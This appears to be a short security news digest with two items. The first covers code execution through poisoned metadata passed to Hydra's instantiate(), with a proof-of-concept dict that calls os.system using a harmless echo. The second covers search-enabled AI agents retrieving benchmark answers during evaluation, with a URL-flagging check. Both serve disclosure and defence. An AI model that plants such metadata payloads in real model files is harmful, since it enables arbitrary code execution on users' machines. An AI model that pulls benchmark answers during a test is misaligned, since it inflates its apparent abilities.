Python libraries for AI/ML models can be poisoned with malicious metadata
Vulnerabilities around Hydra's instantiate() let attackers embed malicious metadata in files consumed by popular AI libraries, so arbitrary code executes automatically when the poisoned files are loaded.
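The mechanism is easiest to see in a minimal sketch (illustrative only, not taken from the original report): Hydra's instantiate() resolves a "_target_" key in a config or metadata dict to any importable callable and invokes it, so attacker-controlled metadata becomes a function call. The payload below is a harmless echo standing in for real malicious code.

```python
# Minimal sketch of the attack pattern, assuming a library blindly passes
# loaded model metadata to Hydra's instantiate().
from hydra.utils import instantiate

# A metadata dict an attacker could embed in a model or config file.
# "_target_" names any importable callable; "_args_" are its positional args.
poisoned_metadata = {
    "_target_": "os.system",
    "_args_": ["echo 'code executed while loading model metadata'"],
}

# Loading code that instantiates objects from untrusted metadata runs the
# attacker's callable automatically.
instantiate(poisoned_metadata)
```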
Search-capable AI agents may cheat on benchmark tests
Search-enabled AI models can retrieve benchmark answers directly from online sources during evaluation, a form of search-time data contamination that inflates their apparent capabilities.
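One hypothetical way an evaluation harness could surface this (the domain list and function names below are illustrative assumptions, not part of any specific benchmark's tooling) is to flag search results that point at sites hosting the benchmark itself:

```python
# Sketch: flag search-result URLs that hit benchmark-hosting domains during
# evaluation, a simple signal of search-time contamination.
from urllib.parse import urlparse

# Assumed list of domains where the benchmark's questions/answers are posted.
BENCHMARK_DOMAINS = {"huggingface.co", "github.com", "paperswithcode.com"}

def flag_contaminated_results(result_urls: list[str]) -> list[str]:
    """Return the URLs whose host matches a benchmark-hosting domain."""
    flagged = []
    for url in result_urls:
        host = urlparse(url).netloc.lower()
        if any(host == d or host.endswith("." + d) for d in BENCHMARK_DOMAINS):
            flagged.append(url)
    return flagged

# Example: URLs returned by an agent's search step during evaluation.
urls = [
    "https://huggingface.co/datasets/some-benchmark/viewer",
    "https://example.com/unrelated-article",
]
print(flag_contaminated_results(urls))  # only the first URL is flagged
```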